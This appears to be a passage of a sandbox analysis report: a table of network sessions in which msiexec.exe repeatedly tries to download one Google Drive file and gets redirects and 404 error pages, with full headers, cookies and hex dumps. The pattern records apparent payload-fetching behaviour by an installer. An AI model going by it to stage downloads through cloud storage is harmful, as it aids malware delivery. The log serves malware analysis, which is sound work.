Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:23 UTC	460	OUT	GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
2024-12-03 15:42:24 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:24 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-aIyapcr214F2SYZ0CBv6-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC7yzxybbGQHdixWirF587o9euFwz36lAMnT78Aq46znOo8kWsbvdna8PbAxHrHqCKqzbQxoQ6ez5w Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:42:24 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 66 46 43 54 61 6b 59 51 74 31 66 51 49 73 63 6d 7a 64 63 61 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RfFCTakYQt1fQIscmzdcag">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49923	172.217.19.174	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:26 UTC	418	OUT	GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
2024-12-03 15:42:27 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:27 GMT Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-eCfMMmGNwrRwuo7_xz_Tng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49930	142.250.181.1	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:29 UTC	460	OUT	GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
2024-12-03 15:42:30 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:30 GMT Content-Security-Policy: script-src 'nonce-gCDCwilFQJroLZxYcCAMiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 X-GUploader-UploadID: AFiumC7Lo2ZmvrRpsn4sG1lpRqNbmdjRbW5ywkF3oqofr8qj_A6U35OdeHsGOUJNNBbaOmH5vGBlPF9bNg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:42:30 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 5f 76 36 4a 6c 57 4a 71 43 64 46 68 48 63 57 36 6f 4f 78 30 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="i_v6JlWJqCdFhHcW6oOx0Q">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49937	172.217.19.174	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:32 UTC	418	OUT	GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
2024-12-03 15:42:33 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:33 GMT Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-GBLSddByg0iycJFvn418Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49945	142.250.181.1	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:35 UTC	460	OUT	GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
2024-12-03 15:42:36 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:35 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-K_qU7H1h0y8laEanXZv6wQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC4GWqdxQdMKEwD_13wPbSvXh3p_XI2PrwtnNmRknO_EtAUbhXcriud0FoZ6G-5YjWtBBUiEzAuK5g Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:42:36 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 41 5a 49 51 53 30 64 77 6c 41 67 2d 75 6e 65 31 7a 4b 64 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qAZIQS0dwlAg-une1zKdug">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49952	172.217.19.174	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:38 UTC	418	OUT	GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
2024-12-03 15:42:39 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:38 GMT Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-IXQtRHHlKu83Xitm2xTd3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49960	142.250.181.1	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:41 UTC	460	OUT	GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
2024-12-03 15:42:42 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:41 GMT Content-Security-Policy: script-src 'nonce-g0yU3za_5L0SxthWSXDTjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC5a9glzorMvCoxJ1eOytCN6c4Pm9J1eGB44HAU8OQPTsh0hZaicFUBPkmhIfAipwZ9gGPrbDkRbYw Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:42:42 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 35 55 66 57 6f 79 35 44 4e 49 6b 43 5f 58 2d 34 53 74 7a 57 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="y5UfWoy5DNIkC_X-4StzWQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49966	172.217.19.174	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:43 UTC	418	OUT	GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
2024-12-03 15:42:44 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:44 GMT Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-dXBpuLKJWtiyab9fCmAIDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49973	142.250.181.1	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
